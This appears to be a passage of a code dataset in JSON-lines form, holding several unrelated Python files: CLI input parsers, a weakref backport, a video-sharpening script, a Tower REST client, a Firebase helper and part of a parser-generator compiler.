width=flags.get_help_width())\n  result = '\\n'.join([wrapper.fill(line) for line in lines.splitlines()])\n  if lines.endswith('\\n'):\n    result += '\\n'\n  return result\n\n\ndef write(message):\n  \"\"\"Writes a message to stdout.\n\n  Args:\n    message: str, the message to write to stdout.\n  \"\"\"\n  sys.stdout.write(_wrap_lines(message) + '\\n')\n  sys.stdout.flush()\n\n\ndef write_break():\n  \"\"\"Writes a line break followed by a line of '-' and two more line breaks.\"\"\"\n  write('')\n  write(''.join(['-' for _ in range(0, flags.get_help_width(), 1)]))\n  write('')\n\n\ndef clear_screen():\n  \"\"\"Clears the screen of the running system.\"\"\"\n  system = platform.system().strip().lower()\n  if system == 'linux':\n    write('\\033[H\\033[J')\n\n\ndef prompt(message, user_prompt=None, default=None, parser=None):\n  \"\"\"Prompts the user for input.\n\n  Args:\n    message: str, the info message to display before prompting for user input.\n    user_prompt: str, the prompt to display before input.\n    default: str, the default value if no other input is provided.\n    parser: Callable, an object to validate and parse the provided input.\n      A parser must meet the following requirements:\n        1) The object must have a parse() method that accepts a single string\n           as input and returns the parsed output.\n        2) Any error that occurs during parse() should raise a ValueError to\n           indicate bad user input with a helpful error message.\n      A working example can be found below as the 'YesNoParser'.\n\n  Returns:\n    The user provided input (optionally parsed).\n\n  
Raises:\n NameError: when the developer provided parser object does not provide the\n public `parse` method.\n \"\"\"\n if user_prompt is None:\n user_prompt = '>>>> '\n\n if default is not None:\n message = '{}\\nDefault: {}'.format(message, default)\n\n while True:\n write(message)\n user_input = input(user_prompt)\n if not user_input and default is not None:\n user_input = default\n if parser is None:\n break\n parse_method = getattr(parser, 'parse', None)\n if parse_method is None or not hasattr(parse_method, '__call__'):\n raise NameError(\n \"the object provided as a parser {!r} must have 'parse' as a public \"\n 'method'.format(parser))\n try:\n user_input = parser.parse(user_input)\n except ValueError as err:\n write(\"Invalid Response: '{}'\\nError: {}\\nPlease try again.\\n\".format(\n user_input, err))\n else:\n break\n write_break()\n return user_input\n\n\nclass Parser(object):\n \"\"\"A base parser object.\"\"\"\n\n def __eq__(self, other):\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\nclass YesNoParser(Parser):\n \"\"\"A Yes/No parser object.\"\"\"\n\n def __init__(self, need_full=False):\n self._need_full = need_full\n self._valid_yes = ('yes',) if need_full else ('y', 'yes')\n self._valid_no = ('no',) if need_full else ('n', 'no')\n\n def __repr__(self):\n return '<{0}({1!r})>'.format(self.__class__.__name__, self._need_full)\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n A boolean for whether or not the provided input is valid.\n\n Raises:\n ValueError: when the provided argument is invalid.\n \"\"\"\n if isinstance(arg, bool):\n return arg\n clean_arg = arg.strip().lower()\n if clean_arg in self._valid_yes:\n return True\n if clean_arg in self._valid_no:\n return False\n raise ValueError(\"the value {!r} is not a 'yes' or 'no'\".format(arg))\n\n\nclass StringParser(Parser):\n \"\"\"A string parser object.\"\"\"\n\n def __init__(self, allow_empty_string=False):\n self._allow_empty_string = allow_empty_string\n\n def __str__(self):\n return self.__class__.__name__\n\n def __repr__(self):\n return '<{0}(allow_empty_string={1!r})>'.format(\n self.__class__.__name__, self._allow_empty_string)\n\n def parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n When overriding this public method in subclasses call self._parse() to\n utilize the string parser.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n The parsed string.\n \"\"\"\n return self._parse(arg)\n\n def _parse(self, arg):\n \"\"\"Parses and validates the provided argument.\n\n Args:\n arg: str, the string to be parsed and validated.\n\n Returns:\n The parsed string.\n\n Raises:\n ValueError: when the provided argument is invalid.\n \"\"\"\n clean_arg = arg.strip()\n if self._allow_empty_string or clean_arg:\n return clean_arg\n raise ValueError('the value {!r} is not a valid string'.format(arg))\n\n\nclass RegExParser(StringParser):\n \"\"\"A regular expression parser object.\"\"\"\n\n def __init__(self, regex, requirements):\n \"\"\"Initializes a regular expression parser.\n\n Args:\n regex: str, the regular expression to use when parsing values.\n requirements: str, the string used to describe the requirements of the\n regular expression in human terms.\n \"\"\"\n super(RegExParser, self).__init__(False)\n self._regex = regex\n self._requirements = requirements\n\n def __repr__(self):\n return 
'<{0}({1!r}, {2!r})>'.format(\n        self.__class__.__name__, self._regex, self._requirements)\n\n  def parse(self, arg):\n    \"\"\"Parses and validates the provided argument.\n\n    Args:\n      arg: str, the string to be parsed and validated.\n\n    Returns:\n      The parsed string.\n\n    Raises:\n      ValueError: when the provided argument is invalid.\n    \"\"\"\n    clean_arg = self._parse(arg)\n    matched_arg = re.match(self._regex, clean_arg)\n    if matched_arg:\n      return matched_arg.string\n    raise ValueError(\n        'the value provided ({!r}) does not match the requirements: {}'.format(\n            arg, self._requirements))\n\n\nclass ProjectIDParser(RegExParser):\n  \"\"\"A Google Cloud Project ID Parser to enforce Google's requirements.\"\"\"\n\n  def __init__(self):\n    super(ProjectIDParser, self).__init__(\n        _PROJECT_ID_REGEX, _PROJECT_REQUIREMENTS)\n\n\nclass EmailParser(RegExParser):\n  \"\"\"An email parser object.\"\"\"\n\n  def __init__(self):\n    super(EmailParser, self).__init__(_EMAIL_REGEX, _EMAIL_REQUIREMENTS)\n\n\nclass ClientIDParser(RegExParser):\n  \"\"\"A Google OAuth2 Client ID parser object.\"\"\"\n\n  def __init__(self):\n    super(ClientIDParser, self).__init__(\n        _CLIENT_ID_REGEX, _CLIENT_ID_REQUIREMENTS)\n\n\nclass VersionParser(Parser):\n  \"\"\"A parser for the Google App Engine Version string.\"\"\"\n\n  def parse(self, arg):\n    \"\"\"Parses and validates the provided argument.\n\n    Args:\n      arg: str, the version string to parse.\n\n    Returns:\n      The valid version string.\n\n    Raises:\n      ValueError: if the version string provided does not meet the requirements.\n    \"\"\"\n    clean_arg = arg.strip().lower()\n    if clean_arg and set(clean_arg).issubset(_VERSION_CHARS):\n      if clean_arg not in _VERSION_BLACKLIST:\n        if not clean_arg.startswith(_VERSION_CANNOT_START_WITH):\n          return clean_arg\n    raise ValueError(_VERSION_REQUIREMENTS.format(arg))\n\n\nclass ListParser(flags.ListParser):\n  \"\"\"A list parser object.\"\"\"\n\n  def __init__(self, allow_empty_list=False):\n    super(ListParser, self).__init__()\n    self._allow_empty_list = allow_empty_list\n\n  def __str__(self):\n    return self.__class__.__name__\n\n  def __repr__(self):\n    return '<{0}(allow_empty_list={1!r})>'.format(\n        self.__class__.__name__, self._allow_empty_list)\n\n  def __eq__(self, other):\n    return self.allow_empty_list == other.allow_empty_list\n\n  def __ne__(self, other):\n    return not self.__eq__(other)\n\n  @property\n  def allow_empty_list(self):\n    return self._allow_empty_list\n\n  def parse(self, arg):\n    \"\"\"Parses and validates the provided argument.\n\n    Args:\n      arg: str, the string of comma separated values to be parsed and validated.\n\n    Returns:\n      The parsed list.\n\n    Raises:\n      ValueError: when the provided argument is invalid.\n    \"\"\"\n    if not self._allow_empty_list and not arg:\n      raise ValueError('an empty list is not allowed')\n    return super(ListParser, self).parse(arg)\n\n\ndef prompt_yes_no(message, need_full=False, **kwargs):\n  \"\"\"Prompts the user for a 'yes' or 'no' as a boolean.\n\n  Args:\n    message: str, the info message to display before prompting for user input.\n    need_full: bool, whether or not the full word ('yes' or 'no') is required.\n    **kwargs: keyword arguments to be passed to prompt.\n\n  Returns:\n    True if the user responded with 'yes' and False if 'no'.\n  \"\"\"\n  return prompt(message, parser=YesNoParser(need_full=need_full), **kwargs)\n\n\ndef prompt_string(message, allow_empty_string=False, **kwargs):\n  \"\"\"Prompts the user for a string.\n\n  Args:\n    message: str, the info message to display before prompting for user input.\n    allow_empty_string: bool, whether or not the response is allowed 
to be an\n empty string.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided string.\n \"\"\"\n return prompt(message, parser=StringParser(allow_empty_string), **kwargs)\n\n\ndef prompt_project_id(message, **kwargs):\n \"\"\"Prompts the user for a Google Cloud Project ID.\n\n Args:\n message: str, the info message to display before prompting for user input.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided Google Cloud Project ID as a string.\n \"\"\"\n return prompt(message, parser=ProjectIDParser(), **kwargs)\n\n\ndef prompt_int(message, minimum=None, maximum=None, **kwargs):\n \"\"\"Prompts the user for an integer.\n\n Args:\n message: str, the info message to display before prompting for user input.\n minimum: int, the minimum accepted value.\n maximum: int, the maximum accepted value.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided int.\n \"\"\"\n parser = flags.IntegerParser(lower_bound=minimum, upper_bound=maximum)\n return prompt(message, parser=parser, **kwargs)\n\n\ndef prompt_csv(message, allow_empty_list=False, **kwargs):\n \"\"\"Prompts the user for a comma separated list of values.\n\n Args:\n message: str, the info message to display before prompting for user input.\n allow_empty_list: bool, whether or not an empty list is considered a valid\n value.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided list of values.\n \"\"\"\n return prompt(message, parser=ListParser(allow_empty_list), **kwargs)\n\n\ndef prompt_enum(message, accepted_values=None, case_sensitive=True, **kwargs):\n \"\"\"Prompts the user for a value within an Enum.\n\n Args:\n message: str, the info message to display before prompting for user input.\n accepted_values: List[Any], a list of accepted values.\n case_sensitive: bool, whether or not validation should require the response\n to be the same case.\n **kwargs: keyword arguments to be passed to prompt.\n\n Returns:\n A user provided value from within the Enum.\n \"\"\"\n message += '\\nAvailable options are: {}'.format(', '.join(accepted_values))\n parser = flags.EnumParser(\n enum_values=accepted_values, case_sensitive=case_sensitive)\n return prompt(message, parser=parser, **kwargs)\n","repo_name":"google/loaner","sub_path":"loaner/deployments/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13858,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"63"} +{"seq_id":"36007327594","text":"from weakref import ref\n\n\nclass WeakMethod(ref):\n \"\"\"\n A custom `weakref.ref` subclass which simulates a weak reference to\n a bound method, working around the lifetime problem of bound methods.\n \"\"\"\n\n __slots__ = \"_func_ref\", \"_meth_type\", \"_alive\", \"__weakref__\"\n\n def __new__(cls, meth, callback=None):\n try:\n obj = meth.__self__\n func = meth.__func__\n except AttributeError:\n raise TypeError(\"argument should be a bound method, not {}\"\n .format(type(meth)))\n def _cb(arg):\n # The self-weakref trick is needed to avoid creating a reference\n # cycle.\n self = self_wr()\n if self._alive:\n self._alive = False\n if callback is not None:\n callback(self)\n self = ref.__new__(cls, obj, _cb)\n self._func_ref = ref(func, _cb)\n self._meth_type = type(meth)\n self._alive = True\n self_wr = ref(self)\n return self\n\n def __call__(self):\n obj = super(WeakMethod, self).__call__()\n func = self._func_ref()\n if obj is None or func is None:\n 
return None\n        return self._meth_type(func, obj)\n\n    def __eq__(self, other):\n        if isinstance(other, WeakMethod):\n            if not self._alive or not other._alive:\n                return self is other\n            return ref.__eq__(self, other) and self._func_ref == other._func_ref\n        return False\n\n    def __ne__(self, other):\n        if isinstance(other, WeakMethod):\n            if not self._alive or not other._alive:\n                return self is not other\n            return ref.__ne__(self, other) or self._func_ref != other._func_ref\n        return True\n\n    __hash__ = ref.__hash__\n","repo_name":"JaniceWuo/MovieRecommend","sub_path":"movierecommend/venv1/Lib/site-packages/django/dispatch/weakref_backports.py","file_name":"weakref_backports.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":575,"dataset":"github-code","pt":"63"}
{"seq_id":"41610134839","text":"# Gaussian bilateral filtering and sharpening\nimport cv2\nimport numpy as np\nimport os\nimport subprocess\n\n\npath = \"/home/bili/\" # path\nfilename = \"aoyi.mp4\" # name of the video file to convert\noutfilename = \"aoyi4full.mp4\"\n\nvc = cv2.VideoCapture(path+filename) # read the video file\n\nw = vc.get(cv2.CAP_PROP_FRAME_WIDTH) # video width\nw = int(w/3)\n\nh = vc.get(cv2.CAP_PROP_FRAME_HEIGHT) # video height\n\nfps = vc.get(cv2.CAP_PROP_FPS) # video frame rate\n\n# write the video file\nfourcc = cv2.VideoWriter_fourcc(*\"mp4v\")\noutname = \"aoyi4out.mp4\" # this video file has no audio and can be deleted afterwards\nvw4 = cv2.VideoWriter(path+outname, fourcc, int(fps*2), (int(w*2.4), int(h*2.4)), isColor=True)\n\nwhile vc.isOpened():\n    retval, image = vc.read()\n    if not retval:\n        break\n    img = np.zeros((int(h), int(w), 3))\n    img = image[:, w:w+w, :]\n    img4 = cv2.resize(img, dsize=(int(w*2.4), int(h*2.4)), interpolation=cv2.INTER_CUBIC)\n    print(image.shape, img.shape, img4.shape)\n    \n    # different convolution kernels give different effects\n    kernel = np.reshape(np.array([0, -1, 0, -1, 5, -1, 0, -1, 0]), (3, 3))\n    #kernel = np.reshape(np.array([-1, -2, -1, -2, 13, -2, -1, -2, -1]), (3, 3))\n    #kernel = np.reshape(np.array([-1, -1, -1, -1, 9, -1, -1, -1, -1]), (3, 3))\n    #kernel = np.reshape(np.array([0, 0, -1, 0, 0, 0, -1, -2, -1, 0, -1, -2, 17, -2, -1, 0, -1, -2, -1, 0, 0, 0, -1, 0, 0]), (5, 5))\n    img4 = cv2.filter2D(img4, -1, kernel)\n    \n    vw4.write(img4)\n    vw4.write(img4)\n    \n    #cv2.imshow(\"xiao\", img)\n    key = cv2.waitKey(0)\n    if key == ord(\"q\"):\n        break\n\nvc.release()\nvw4.release()\ncv2.destroyAllWindows()\n\n# audio file name\nm4aname = \"aoyiout.m4a\"\n# extract the audio track from the source video\nsubprocess.run([\"ffmpeg\", \"-i\", path+filename, \"-vn\", \"-codec\", \"copy\", path+m4aname]) \n# merge the extracted audio with the new video file\nsubprocess.run([\"ffmpeg\", \"-i\", path+outname, \"-i\", path+m4aname, \"-c:v\", \"copy\", \"-c:a\", \"aac\", \"-strict\", \"experimental\", path+outfilename])\nexit()\n\n","repo_name":"xialibing/bili_shuping","sub_path":"bili.py","file_name":"bili.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"70593011402","text":"\"\"\"DAO classes.\"\"\"\nfrom .user import UserDAO\nfrom .country import CountryDAO\nfrom .city import CityDAO\nfrom .category import CategoryDAO\nfrom .subcategory import SubcategoryDAO\n\n__all__ = [\n    'UserDAO',\n    'user_repository',\n    'CountryDAO',\n    'country_repository',\n    'CityDAO',\n    'city_repository',\n    'CategoryDAO',\n    'category_repository',\n    'SubcategoryDAO',\n    'subcategory_repository',\n]\n\nuser_repository = UserDAO()\ncountry_repository = CountryDAO()\ncity_repository = CityDAO()\ncategory_repository = CategoryDAO()\nsubcategory_repository = 
SubcategoryDAO()\n","repo_name":"gizyatullov/api-users","sub_path":"fastapi_template/db/dao/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"2456498816","text":"import re\nfrom enum import Enum\nfrom typing import List, NamedTuple\n\nimport libkol\n\nfrom .request import Request\nfrom ..util import parsing\n\nresponse_pattern = re.compile(r\"You sell your (.*?) to (?:.*?) for ([0-9,]+) Meat.\")\n\n\nclass Response(NamedTuple):\n    items: List[\"libkol.types.ItemQuantity\"]\n    meat_gained: int\n\n\nclass AutosellMode(Enum):\n    All = 1\n    AllButOne = 2\n    Quantity = 3\n\n\nclass autosell_items(Request[Response]):\n    \"\"\"\n    Sells items via the autosell system\n    \"\"\"\n\n    def __init__(\n        self,\n        session: \"libkol.Session\",\n        items: List[\"libkol.Item\"],\n        quantity: int = 1,\n        all: bool = False,\n        keep_one: bool = False,\n    ):\n        params = {\"action\": \"sell\"}\n\n        if keep_one:\n            params[\"mode\"] = AutosellMode.AllButOne.value\n        elif all:\n            params[\"mode\"] = AutosellMode.All.value\n        else:\n            params[\"mode\"] = AutosellMode.Quantity.value\n            params[\"quantity\"] = str(quantity)\n\n        for item in items:\n            params[\"item{}\".format(item.id)] = str(item.id)\n\n        self.request = session.request(\"sellstuff_ugly.php\", pwd=True, params=params)\n\n    @staticmethod\n    async def parser(\n        content: str, items: List[\"libkol.Item\"] = [], **kwargs\n    ) -> Response:\n        from libkol.types import ItemQuantity\n\n        response_match = response_pattern.search(content)\n\n        if response_match is None:\n            return Response([], 0)\n\n        item_quantities = []  # type: List[\"libkol.types.ItemQuantity\"]\n\n        for item in items:\n            pattern = re.compile(\n                r\"(?:(?:([0-9,]+) {})|{})(?:,|$)\".format(\n                    re.escape(item.pluralize()), re.escape(str(item.name))\n                )\n            )\n            match = pattern.search(response_match.group(1))\n            quantity = (\n                0\n                if match is None\n                else 1\n                if match.group(1) is None\n                else parsing.to_int(match.group(1))\n            )\n            item_quantities += [ItemQuantity(item, quantity)]\n\n        return Response(\n            items=item_quantities, meat_gained=parsing.to_int(response_match.group(2))\n        )\n","repo_name":"python-kol/libkol","sub_path":"libkol/request/autosell_items.py","file_name":"autosell_items.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"}
{"seq_id":"42255342179","text":"# encoding=utf-8\nimport pymongo\nfrom items import InformationItem, TweetsItem, FollowsItem, FansItem\n\nclass MongoDBPipleline(object):\n    def __init__(self):\n        client = pymongo.MongoClient(\"localhost\", 27017)\n        db = client[\"Sina\"]\n        self.Information = db[\"Information\"]\n        self.Tweets = db[\"Tweets\"]\n        self.num = 0\n        # self.Follows = db[\"Follows\"]\n        # self.Fans = db[\"Fans\"]\n\n    def process_item(self, item, spider):\n        \"\"\" Determine the item type, handle it accordingly, then write it into the database \"\"\"\n        # inf = InformationItem()\n        # print(isinstance(inf, InformationItem), type(InformationItem),type(inf))\n        # print(\"process item....:\",type(item), isinstance(item,InformationItem),isinstance(item, TweetsItem), type(item)==TweetsItem)\n        if isinstance(item, InformationItem) or item.type == 1:\n            try:\n                self.Information.insert_one(dict(item))\n                # print(\"information\")\n            except Exception:\n                pass\n        elif isinstance(item, TweetsItem) or item.type ==2 :\n            try:\n                self.Tweets.insert_one(dict(item))\n            except Exception as e:\n                print(e)\n            try:\n                with 
open(\"E:\\\\tasks\\\\PPGCN\\\\Data\\\\trainData\\\\event_\"+str(self.num)+\".txt\",\"w\") as f:\n                    # Line 0: publish time; line 1: weibo content; line 2: text attributes; line 3: label\n                    content = str(dict(item))\n                    f.write(content)\n                    f.close()\n                    self.num += 1\n                # print(\"tweets\")\n            except Exception as e:\n                print(e)\n        # elif isinstance(item, FollowsItem):\n        #     followsItems = dict(item)\n        #     follows = followsItems.pop(\"follows\")\n        #     for i in range(len(follows)):\n        #         followsItems[str(i + 1)] = follows[i]\n        #     try:\n        #         self.Follows.insert(followsItems)\n        #     except Exception:\n        #         pass\n        # elif isinstance(item, FansItem):\n        #     fansItems = dict(item)\n        #     fans = fansItems.pop(\"fans\")\n        #     for i in range(len(fans)):\n        #         fansItems[str(i + 1)] = fans[i]\n        #     try:\n        #         self.Fans.insert(fansItems)\n        #     except Exception:\n        #         pass\n        return item\n","repo_name":"asevergreen/GCN","sub_path":"Sina_spider1/Sina_spider1/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"5001378692","text":"with open(\"27-110a.txt\") as F:\n    N, K = map(int, F.readline().split())\n    data = []\n    for i in range(N):\n        a, b = map( int, F.readline().split() )\n        data.append( (a, b) )\n\ndef rec( pos, Lplus = 0 ):\n    if pos >= N: return 0\n    res0 = rec( pos+1, Lplus )\n    resx = data[pos][1] + rec( pos+1, 0 )\n    res = res0 if res0 > resx else resx\n    if Lplus < K:\n        res1 = data[pos][0] + rec(pos+1, Lplus+1)\n        res = max(res, res1)\n    return res\n\nprint( rec(0) )\n\n# If you need to see which values were chosen...\n\"\"\"\ndef rec( pos, Lplus = 0, prog = '' ):\n    if pos >= N: return (0, prog)\n    res0, prog0 = rec( pos+1, Lplus, prog + '0' )\n    resx, progx = rec( pos+1, 0, prog + 'x' )\n    resx += data[pos][1]\n    res, newProg = (res0, prog0) if res0 > resx else \\\n                   (resx, progx)\n    if Lplus < K:\n        res1, prog1 = rec(pos+1, Lplus+1, prog + '1')\n        res1 += data[pos][0]\n        if res1 > res:\n            res, newProg = res1, prog1\n\n    return res, newProg\n\nprint( *rec(0) )\n\"\"\"","repo_name":"notjik/informatics","sub_path":"classworks/ege/27ege/data/110/27-110bad.py","file_name":"27-110bad.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"}
{"seq_id":"34067651991","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom MissRaya.vars import FDBURL\n\n\ncred = credentials.Certificate(\n    'Database.json')\n\nfirebase_admin.initialize_app(cred, {\n    'databaseURL': f'{FDBURL}'\n})\n\n# Main Ref\nref = db.reference('MissRaya/')\n\n# Users and Groups\nGrps = ref.child('Groups/')\nUsers = ref.child('Users/')\n\n# All Users And Admins\nAll = Users.child('All/')\nAdmins = Users.child('Admins/')\n\n# Data Ref\nData = ref.child('Data/')\n\n# Funcs\ndef AddGroup(Title: str, ID: int):\n    data = {ID: Title}\n    Grps.update(data)\n    print(f'Added {Title} to Database')\n\n\ndef AddUser(Username: str, ID: int):\n    data = {ID: Username}\n    All.update(data)\n    print(f'Added User @{Username} to Database')\n\n\ndef AddAdmin(Username: str, ID: int):\n    data = {ID: Username}\n    Admins.update(data)\n    print(f'Promoted User @{Username} As Admin')\n\n\ndef GetGrps():\n    data = Grps.get()\n    return data\n\n\ndef GetUsers():\n    data = All.get()\n    return data\n\n\ndef GetAdmins():\n    data = Admins.get()\n    return data\n\n\ndef RemUser(Id):\n    data = All.get()\n    data.pop(Id, None)\n    
All.set(data)\n","repo_name":"TharukRenuja/MissRaya","sub_path":"MissRaya/helpers/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"63"} +{"seq_id":"28647700106","text":"\"\"\"Tower API module interacts using the REST API to\n 1. Get a single object\n 2. Get multiple objects with pagination info\n 3. POST a Job Template/Workflow\n\"\"\"\nfrom pathlib import Path\nfrom distutils.util import strtobool\nfrom django.conf import settings\nimport requests\n\nrequests.packages.urllib3.disable_warnings()\n\n\nclass TowerAPI:\n \"\"\"TowerAPI class supports GET/POST to tower given a slug\"\"\"\n\n VALID_POST_CODES = [200, 201, 202]\n VALID_GET_CODES = [200]\n\n def __init__(self, url=None, token=None, verify_ssl=None):\n if url is None:\n url = settings.CONTROLLER_URL\n self.url = url.rstrip(\"/\")\n\n if token is None:\n token = settings.CONTROLLER_TOKEN\n\n if verify_ssl is None:\n verify_ssl = settings.CONTROLLER_VERIFY_SSL\n\n if Path(verify_ssl).is_file():\n self.verify_ssl = verify_ssl\n else:\n self.verify_ssl = bool(strtobool(verify_ssl))\n\n self.headers = {\"Authorization\": f\"Bearer {token}\"}\n\n self.attr_delimiter = \".\"\n\n def get(self, obj_url, attrs):\n \"\"\"This generator function fetches objects from multiple pages and\n yields one object at a time to the caller\n \"\"\"\n next_url = obj_url\n try:\n while next_url:\n response = requests.get(\n f\"{self.url}{next_url}\",\n headers=self.headers,\n verify=self.verify_ssl,\n )\n if response.status_code in self.VALID_GET_CODES:\n data = response.json()\n next_url = data.get(\"next\", None)\n if \"results\" in data:\n for payload in data[\"results\"]:\n yield self._filtered(payload, attrs)\n else:\n yield self._filtered(data, attrs)\n else:\n raise RuntimeError(\n \"GET failed %s status %s body %s\"\n % (next_url, response.status_code, response.text)\n )\n except requests.exceptions.RequestException as exc:\n raise exc\n\n def post(self, slug, payload, attrs):\n \"\"\"Post to a URL and get the response back\n the payload is a python dictionary and will be\n sent up as json\n \"\"\"\n try:\n response = requests.post(\n f\"{self.url}{slug}\",\n headers=self.headers,\n verify=self.verify_ssl,\n json=payload,\n )\n if response.status_code in self.VALID_POST_CODES:\n data = response.json()\n return self._filtered(data, attrs)\n\n raise RuntimeError(\n \"POST failed %s status %s body %s\"\n % (slug, response.status_code, response.text)\n )\n except requests.exceptions.RequestException as exc:\n raise exc\n\n def _filtered(self, payload, attrs):\n \"\"\"Build an object by filtering out unwanted variables\"\"\"\n obj = {}\n for attr in attrs:\n if self.attr_delimiter in attr:\n data = payload\n for key in attr.split(self.attr_delimiter):\n if key in data:\n data = data[key]\n else:\n data = None\n break\n obj[attr] = data\n else:\n obj[attr] = payload.get(attr, None)\n return obj\n","repo_name":"ansible/pinakes","sub_path":"pinakes/main/inventory/task_utils/tower_api.py","file_name":"tower_api.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"23557200517","text":"\"\"\"\nMacroParse will be built atop the existing \"mini\" parsing and scanning tools.\nIt extends the language of attributed context-free grammars with additional features described on the wiki page.\n\nThe design for this module is still in flux, although most 
of the main ideas are laid out.\nThe concept is a single-file definition of both lexical and syntactic analysis embedded within MarkDown text.\n\nMarkdown as a container format is straightforward to analyze with available string operations or\nsimple applications of standard Python regex machinery. However, the miniscan/miniparse machinery is\nextremely handy for recovering the syntactic structure of actual rules, so that's used here.\n\n========================================\n\n\"\"\"\nimport re, os, collections\nfrom typing import NamedTuple, List\nfrom ..support import foundation, failureprone\nfrom ..parsing.context_free import ContextFreeGrammar\nfrom ..parsing.automata import DragonBookTable, ParsingStyle, GeneralizedStyle, DeterministicStyle, HFA, tabulate\nfrom ..scanning import finite, regular, charset\nfrom ..scanning.interface import INITIAL\nfrom . import grammar, compaction\nfrom .interface import ScanAction\n\n\nclass TextBookForm:\n\t\"\"\" This provides the various views of the text-book form of scan and parse tables. \"\"\"\n\tdef __init__(self, *, dfa: finite.DFA, scan_actions:List[ScanAction], parse_table: DragonBookTable):\n\t\tself.dfa = dfa\n\t\tself.scan_actions = scan_actions\n\t\tself.parse_table = parse_table\n\tdef as_compact_form(self, *, filename):\n\t\treturn {\n\t\t\t'description': 'MacroParse Automaton',\n\t\t\t'version': (0, 0, 3),\n\t\t\t'source': filename,\n\t\t\t'scanner': self.compact_scanner(),\n\t\t\t'parser': self.compact_parser(),\n\t\t}\n\tdef compact_scanner(self):\n\t\tdfa = self.dfa\n\t\tif dfa is None: return\n\t\treturn {\n\t\t\t'dfa': compaction.compress_scanner(initial=dfa.initial, matrix=dfa.states, final=dfa.final),\n\t\t\t'action': dict(zip(ScanAction._fields, zip(*self.scan_actions))),\n\t\t\t'alphabet': {'bounds': dfa.alphabet.bounds, 'classes': dfa.alphabet.classes,}\n\t\t}\n\tdef compact_parser(self):\n\t\ttable = self.parse_table\n\t\tif table is None: return\n\t\tsymbol_index = {s: i for i, s in enumerate(table.terminals + table.nonterminals)}\n\t\tsymbol_index[None] = None\n\t\tform = {\n\t\t\t'initial': table.initial,\n\t\t\t'action': compaction.compress_action_table(table.action_matrix, table.nonassoc_errors),\n\t\t\t'goto': compaction.compress_goto_table(table.goto_matrix),\n\t\t\t'terminals': table.terminals,\n\t\t\t'nonterminals': table.nonterminals,\n\t\t\t'breadcrumbs': [symbol_index[s] for s in table.breadcrumbs],\n\t\t\t'rule': encode_parse_rules(table.rule_table, table.constructors, table.rule_provenance),\n\t\t}\n\t\tif table.splits: form['splits'] = table.splits\n\t\treturn form\n\tdef pretty_print(self):\n\t\tif self.dfa is not None:\n\t\t\tself.dfa.stats()\n\t\t\tself.dfa.display()\n\t\tif self.parse_table is not None:\n\t\t\tself.parse_table.stats()\n\t\t\tself.parse_table.display()\n\tdef report_stats(self):\n\t\tif self.dfa is not None:\n\t\t\tself.dfa.stats()\n\t\tif self.parse_table is not None:\n\t\t\tself.parse_table.stats()\n\tdef make_csv(self, pathstem):\n\t\tif self.dfa is not None:\n\t\t\tself.dfa.make_csv(pathstem)\n\t\tif self.parse_table is not None:\n\t\t\tself.parse_table.make_csv(pathstem)\n\nclass IntermediateForm(NamedTuple):\n\tnfa: finite.NFA\n\tscan_actions: List[ScanAction]\n\thfa: HFA\n\tcfg: ContextFreeGrammar\n\tparse_style:ParsingStyle\n\tdef determinize(self) -> TextBookForm:\n\t\tdfa = self.nfa.subset_construction().minimize_states().minimize_alphabet() if self.nfa.states else None\n\t\tparse_table = tabulate(self.hfa, self.cfg, style=self.parse_style)\n\t\treturn TextBookForm(dfa=dfa, 
scan_actions=self.scan_actions, parse_table=parse_table)\n\tdef make_dot_file(self, path): self.hfa.make_dot_file(path)\n\n\ndef compile_string(document:str, strict:bool, method=None) -> IntermediateForm:\n\ttext = failureprone.SourceText(document)\n\treturn _compile_text(text, strict, method)\n\ndef compile_file(pathname, *, verbose=False, strict=True, method=None) -> dict:\n\twith(open(pathname)) as fh:\n\t\ttext = failureprone.SourceText(fh.read(), filename=pathname)\n\tintermediate_form = _compile_text(text, strict, method)\n\ttextbook_form = intermediate_form.determinize()\n\tif verbose:\n\t\tprint(\"\\n -- \", pathname, \" --\")\n\t\ttextbook_form.pretty_print()\n\treturn textbook_form.as_compact_form(filename=os.path.basename(pathname))\n\nSTRERROR = {\n\tregular.VariableTrailingContextError: \"Variable size for both stem and trailing context is not currently supported.\",\n}\n\ndef _compile_text(document:failureprone.SourceText, strict:bool, method=None) -> IntermediateForm:\n\t\"\"\" This has the job of reading the specification and building the textbook-form tables. \"\"\"\n\t# The approach is a sort of outside-in parse. The outermost layer concerns the overall markdown document format,\n\t# which is dealt with in the main body of this routine prior to determinizing and serializing everything.\n\t# Each major sub-language is line-oriented and interpreted with one of the following five subroutines:\n\t\n\tdef handle_meta_exception(e: Exception, pattern_text:str):\n\t\tif isinstance(e, 